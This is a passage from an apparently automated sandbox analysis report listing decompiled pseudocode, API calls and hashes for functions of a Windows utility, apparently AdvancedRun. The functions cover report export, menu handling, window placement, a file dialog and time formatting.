                                                                                                                  • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                • _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                • wcschr.MSVCRT ref: 00405A0E
                                                                                                                • _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                                                                • String ID:
                                                                                                                • API String ID: 768606695-0
                                                                                                                • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                                                                • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 64%
                                                                                                                			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				void _v68;
                                                                                                                				char _v108;
                                                                                                                				void _v160;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t55;
                                                                                                                				void* _t57;
                                                                                                                				wchar_t* _t67;
                                                                                                                				intOrPtr* _t73;
                                                                                                                				signed int _t74;
                                                                                                                				signed int _t86;
                                                                                                                				signed int _t95;
                                                                                                                				intOrPtr* _t98;
                                                                                                                				void* _t100;
                                                                                                                				void* _t102;
                                                                                                                
                                                                                                                				_t73 = __ebx;
                                                                                                                				_t74 = 0xd;
                                                                                                                				_push(9);
                                                                                                                				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
                                                                                                                				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
                                                                                                                				_t102 = _t100 + 0x18;
                                                                                                                				asm("movsw");
                                                                                                                				E00407343(__ebx, _a4, L"<tr>");
                                                                                                                				_t95 = 0;
                                                                                                                				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
                                                                                                                					do {
                                                                                                                						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
                                                                                                                						_v8 = _t55;
                                                                                                                						_t57 =  &_v160;
                                                                                                                						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
                                                                                                                							_t57 =  &_v68;
                                                                                                                						}
                                                                                                                						_t98 = _a8;
                                                                                                                						_v28 = _v28 | 0xffffffff;
                                                                                                                						_v24 = _v24 | 0xffffffff;
                                                                                                                						_v20 = _v20 | 0xffffffff;
                                                                                                                						_v16 = _v16 & 0x00000000;
                                                                                                                						_v12 = _t57;
                                                                                                                						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
                                                                                                                						E0040ADC0(_v28,  &_v108);
                                                                                                                						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
                                                                                                                						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
                                                                                                                						_t67 =  *(_t73 + 0x64);
                                                                                                                						_t86 =  *_t67 & 0x0000ffff;
                                                                                                                						if(_t86 == 0 || _t86 == 0x20) {
                                                                                                                							wcscat(_t67, L"&nbsp;");
                                                                                                                						}
                                                                                                                						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
                                                                                                                						_push( *((intOrPtr*)(_t73 + 0x68)));
                                                                                                                						_push( &_v108);
                                                                                                                						_push(_v12);
                                                                                                                						_push(0x2000);
                                                                                                                						_push( *((intOrPtr*)(_t73 + 0x60)));
                                                                                                                						L0040B1EC();
                                                                                                                						_t102 = _t102 + 0x1c;
                                                                                                                						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
                                                                                                                						_t95 = _t95 + 1;
                                                                                                                					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
                                                                                                                				}
                                                                                                                				return E00407343(_t73, _a4, L"\r\n");
                                                                                                                			}
























                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfwcscat
                                                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                • API String ID: 384018552-4153097237
                                                                                                                • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                                                                • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 42%
                                                                                                                			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
                                                                                                                				struct tagMENUITEMINFOW _v0;
                                                                                                                				int _t24;
                                                                                                                				wchar_t* _t30;
                                                                                                                				intOrPtr _t32;
                                                                                                                				int _t34;
                                                                                                                				int _t42;
                                                                                                                				signed int _t47;
                                                                                                                				signed int _t48;
                                                                                                                
                                                                                                                				_t36 = __ecx;
                                                                                                                				_t48 = _t47 & 0xfffffff8;
                                                                                                                				E0040B550(0x203c, __ecx);
                                                                                                                				_t24 = GetMenuItemCount(_a8);
                                                                                                                				_t34 = _t24;
                                                                                                                				_t42 = 0;
                                                                                                                				if(_t34 <= 0) {
                                                                                                                					L13:
                                                                                                                					return _t24;
                                                                                                                				} else {
                                                                                                                					goto L1;
                                                                                                                				}
                                                                                                                				do {
                                                                                                                					L1:
                                                                                                                					memset( &_a50, 0, 0x2000);
                                                                                                                					_t48 = _t48 + 0xc;
                                                                                                                					_a36 =  &_a48;
                                                                                                                					_v0.cbSize = 0x30;
                                                                                                                					_a4 = 0x36;
                                                                                                                					_a40 = 0x1000;
                                                                                                                					_a16 = 0;
                                                                                                                					_a48 = 0;
                                                                                                                					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
                                                                                                                					if(_t24 == 0) {
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                					if(_a48 == 0) {
                                                                                                                						L10:
                                                                                                                						_t56 = _a20;
                                                                                                                						if(_a20 != 0) {
                                                                                                                							_push(0);
                                                                                                                							_push(_a20);
                                                                                                                							_push(_a4);
                                                                                                                							_t24 = E0040605E(_t36, _t56);
                                                                                                                							_t48 = _t48 + 0xc;
                                                                                                                						}
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                					_t30 = wcschr( &_a48, 9);
                                                                                                                					if(_t30 != 0) {
                                                                                                                						 *_t30 = 0;
                                                                                                                					}
                                                                                                                					_t31 = _a16;
                                                                                                                					if(_a20 != 0) {
                                                                                                                						if(_a12 == 0) {
                                                                                                                							 *0x40fe20 =  *0x40fe20 + 1;
                                                                                                                							_t32 =  *0x40fe20; // 0x0
                                                                                                                							_t31 = _t32 + 0x11558;
                                                                                                                							__eflags = _t32 + 0x11558;
                                                                                                                						} else {
                                                                                                                							_t17 = _t42 + 0x11171; // 0x11171
                                                                                                                							_t31 = _t17;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t24 = E00406025(_t31,  &_a48);
                                                                                                                					_pop(_t36);
                                                                                                                					goto L10;
                                                                                                                					L12:
                                                                                                                					_t42 = _t42 + 1;
                                                                                                                				} while (_t42 < _t34);
                                                                                                                				goto L13;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                • String ID: 0$6
                                                                                                                • API String ID: 2029023288-3849865405
                                                                                                                • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                                                • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E00402BEE(void* __ebx) {
                                                                                                                				int _v8;
                                                                                                                				int _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				int _v24;
                                                                                                                				int _v28;
                                                                                                                				void* _t27;
                                                                                                                				int _t31;
                                                                                                                				void* _t34;
                                                                                                                				int _t37;
                                                                                                                				int _t38;
                                                                                                                				int _t41;
                                                                                                                				int _t50;
                                                                                                                
                                                                                                                				_t34 = __ebx;
                                                                                                                				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
                                                                                                                					return _t27;
                                                                                                                				} else {
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					_v8 = GetSystemMetrics(0x4e);
                                                                                                                					_v12 = GetSystemMetrics(0x4f);
                                                                                                                					_t41 = GetSystemMetrics(0x4c);
                                                                                                                					_t31 = GetSystemMetrics(0x4d);
                                                                                                                					if(_v8 == 0 || _v12 == 0) {
                                                                                                                						_v8 = GetSystemMetrics(0);
                                                                                                                						_v12 = GetSystemMetrics(1);
                                                                                                                						_t41 = 0;
                                                                                                                						_t31 = 0;
                                                                                                                					} else {
                                                                                                                						_v8 = _v8 + _t41;
                                                                                                                						_v12 = _v12 + _t31;
                                                                                                                					}
                                                                                                                					_t50 = _v20 - _v28;
                                                                                                                					if(_t50 > 0x14) {
                                                                                                                						_t38 = _v24;
                                                                                                                						_t37 = _v16 - _t38;
                                                                                                                						if(_t37 > 0x14 && _v20 > _t41 + 5) {
                                                                                                                							_t31 = _t31 + 0xfffffff6;
                                                                                                                							if(_t38 >= _t31) {
                                                                                                                								_t31 = _v28;
                                                                                                                								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
                                                                                                                									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					return _t31;
                                                                                                                				}
                                                                                                                			}

















                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C1C
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C23
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C2A
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C30
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C47
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C4E
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem$Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 1155976603-0
                                                                                                                • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                                                                • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004036D5(void* __edi, void* __eflags) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				char _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				char* _v24;
                                                                                                                				char _v28;
                                                                                                                				char* _v48;
                                                                                                                				intOrPtr _v56;
                                                                                                                				intOrPtr _v60;
                                                                                                                				int _v64;
                                                                                                                				int _v72;
                                                                                                                				intOrPtr _v76;
                                                                                                                				wchar_t* _v80;
                                                                                                                				intOrPtr _v84;
                                                                                                                				int _v92;
                                                                                                                				char* _v96;
                                                                                                                				intOrPtr _v104;
                                                                                                                				struct tagOFNA _v108;
                                                                                                                				void _v634;
                                                                                                                				long _v636;
                                                                                                                				void _v2682;
                                                                                                                				char _v2684;
                                                                                                                				void* __ebx;
                                                                                                                				char _t37;
                                                                                                                				intOrPtr _t38;
                                                                                                                				int _t46;
                                                                                                                				signed short _t54;
                                                                                                                
                                                                                                                				_v636 = 0;
                                                                                                                				memset( &_v634, 0, 0x208);
                                                                                                                				_v2684 = 0;
                                                                                                                				memset( &_v2682, 0, 0x7fe);
                                                                                                                				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
                                                                                                                				_v12 = _t37;
                                                                                                                				_t38 =  *0x40cbf0; // 0x67
                                                                                                                				_v8 = _t38;
                                                                                                                				_v28 = E00405B81(0x227);
                                                                                                                				_v24 = L"*.cfg";
                                                                                                                				_v20 = E00405B81(0x228);
                                                                                                                				_v16 = L"*.*";
                                                                                                                				E00405236( &_v2684,  &_v28);
                                                                                                                				_t54 = 0xa;
                                                                                                                				_v60 = E00405B81(_t54);
                                                                                                                				_v104 =  *((intOrPtr*)(__edi + 0x10));
                                                                                                                				_v48 =  &_v12;
                                                                                                                				_v96 =  &_v2684;
                                                                                                                				_v108 = 0x4c;
                                                                                                                				_v92 = 0;
                                                                                                                				_v84 = 1;
                                                                                                                				_v80 =  &_v636;
                                                                                                                				_v76 = 0x104;
                                                                                                                				_v72 = 0;
                                                                                                                				_v64 = 0;
                                                                                                                				_v56 = 0x80806;
                                                                                                                				_t46 = GetSaveFileNameW( &_v108);
                                                                                                                				if(_t46 != 0) {
                                                                                                                					wcscpy( &_v636, _v80);
                                                                                                                					return E0040365E(__edi, 1,  &_v636);
                                                                                                                				}
                                                                                                                				return _t46;
                                                                                                                			}































                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004036F6
                                                                                                                • memset.MSVCRT ref: 00403712
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                  • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                  • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                  • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                                                                  • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                                                                  • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                                                                  • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                                                                  • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                                                                  • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                                                                • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                                                                • wcscpy.MSVCRT ref: 004037C3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                • String ID: L$cfg
                                                                                                                • API String ID: 275899518-3734058911
                                                                                                                • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                                                                • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
                                                                                                                				struct _SYSTEMTIME _v20;
                                                                                                                				long _v276;
                                                                                                                				long _v532;
                                                                                                                				FILETIME* _t15;
                                                                                                                
                                                                                                                				_t15 = __eax;
                                                                                                                				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
                                                                                                                					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
                                                                                                                						goto L5;
                                                                                                                					} else {
                                                                                                                						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
                                                                                                                						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
                                                                                                                						wcscpy(_a4,  &_v276);
                                                                                                                						wcscat(_a4, " ");
                                                                                                                						wcscat(_a4,  &_v532);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L5:
                                                                                                                					wcscpy(_a4, 0x40c4e8);
                                                                                                                				}
                                                                                                                				return _a4;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                                                                • wcscpy.MSVCRT ref: 00404F41
                                                                                                                • wcscat.MSVCRT ref: 00404F4E
                                                                                                                • wcscat.MSVCRT ref: 00404F5D
                                                                                                                • wcscpy.MSVCRT ref: 00404F71
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 1331804452-0
                                                                                                                • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                                                                • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 71%
                                                                                                                			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
                                                                                                                				void _v514;
                                                                                                                				long _v516;
                                                                                                                				wchar_t* _t34;
                                                                                                                				signed int _t35;
                                                                                                                				void* _t36;
                                                                                                                				void* _t37;
                                                                                                                
                                                                                                                				_t34 = __edi;
                                                                                                                				_v516 = _v516 & 0x00000000;
                                                                                                                				memset( &_v514, 0, 0x1fc);
                                                                                                                				 *__edi =  *__edi & 0x00000000;
                                                                                                                				_t37 = _t36 + 0xc;
                                                                                                                				_t35 = 0;
                                                                                                                				do {
                                                                                                                					_push( *(_t35 + _a4) & 0x000000ff);
                                                                                                                					_push(L"%2.2X");
                                                                                                                					_push(0xff);
                                                                                                                					_push( &_v516);
                                                                                                                					L0040B1EC();
                                                                                                                					_t37 = _t37 + 0x10;
                                                                                                                					if(_t35 > 0) {
                                                                                                                						wcscat(_t34, " ");
                                                                                                                					}
                                                                                                                					if(_a8 > 0) {
                                                                                                                						asm("cdq");
                                                                                                                						if(_t35 % _a8 == 0) {
                                                                                                                							wcscat(_t34, L"  ");
                                                                                                                						}
                                                                                                                					}
                                                                                                                					wcscat(_t34,  &_v516);
                                                                                                                					_t35 = _t35 + 1;
                                                                                                                				} while (_t35 < 0x80);
                                                                                                                				return _t34;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$_snwprintfmemset
                                                                                                                • String ID: %2.2X
                                                                                                                • API String ID: 2521778956-791839006
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 42%
                                                                                                                			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                				void _v514;
                                                                                                                				char _v516;
                                                                                                                				void _v1026;
                                                                                                                				char _v1028;
                                                                                                                				void* __esi;
                                                                                                                				intOrPtr* _t16;
                                                                                                                				void* _t19;
                                                                                                                				intOrPtr* _t29;
                                                                                                                				char* _t31;
                                                                                                                
                                                                                                                				_t29 = __ecx;
                                                                                                                				_v516 = 0;
                                                                                                                				memset( &_v514, 0, 0x1fc);
                                                                                                                				_v1028 = 0;
                                                                                                                				memset( &_v1026, 0, 0x1fc);
                                                                                                                				_t16 = _t29;
                                                                                                                				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
                                                                                                                					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
                                                                                                                				} else {
                                                                                                                					_push(L"<?xml version=\"1.0\" ?>\r\n");
                                                                                                                				}
                                                                                                                				E00407343(_t16);
                                                                                                                				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
                                                                                                                				_t31 =  &_v516;
                                                                                                                				E00407250(_t31, _t19);
                                                                                                                				_push(_t31);
                                                                                                                				_push(L"<%s>\r\n");
                                                                                                                				_push(0xff);
                                                                                                                				_push( &_v1028);
                                                                                                                				L0040B1EC();
                                                                                                                				return E00407343(_t29, _a4,  &_v1028);
                                                                                                                			}













                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                                                                • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                                                                • <%s>, xrefs: 00407DF3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf
                                                                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                • API String ID: 3473751417-2880344631
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 70%
                                                                                                                			E00403B3C(intOrPtr _a4) {
                                                                                                                				void _v526;
                                                                                                                				char _v528;
                                                                                                                				void _v2574;
                                                                                                                				char _v2576;
                                                                                                                				void* __edi;
                                                                                                                				intOrPtr _t29;
                                                                                                                
                                                                                                                				_v2576 = 0;
                                                                                                                				memset( &_v2574, 0, 0x7fe);
                                                                                                                				_v528 = 0;
                                                                                                                				memset( &_v526, 0, 0x208);
                                                                                                                				E00404AD9( &_v528);
                                                                                                                				_push( &_v528);
                                                                                                                				_push(L"\"%s\" /EXEFilename \"%%1\"");
                                                                                                                				_push(0x3ff);
                                                                                                                				_push( &_v2576);
                                                                                                                				L0040B1EC();
                                                                                                                				_t37 = _a4 + 0xa68;
                                                                                                                				E00404923(0x104, _a4 + 0xa68, L"exefile");
                                                                                                                				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
                                                                                                                				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
                                                                                                                				_t29 = E0040467A(_t37);
                                                                                                                				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
                                                                                                                				return _t29;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00403B5D
                                                                                                                • memset.MSVCRT ref: 00403B76
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                  • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                                                                  • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                                                                  • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                  • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                Strings
                                                                                                                Memory Dump Source
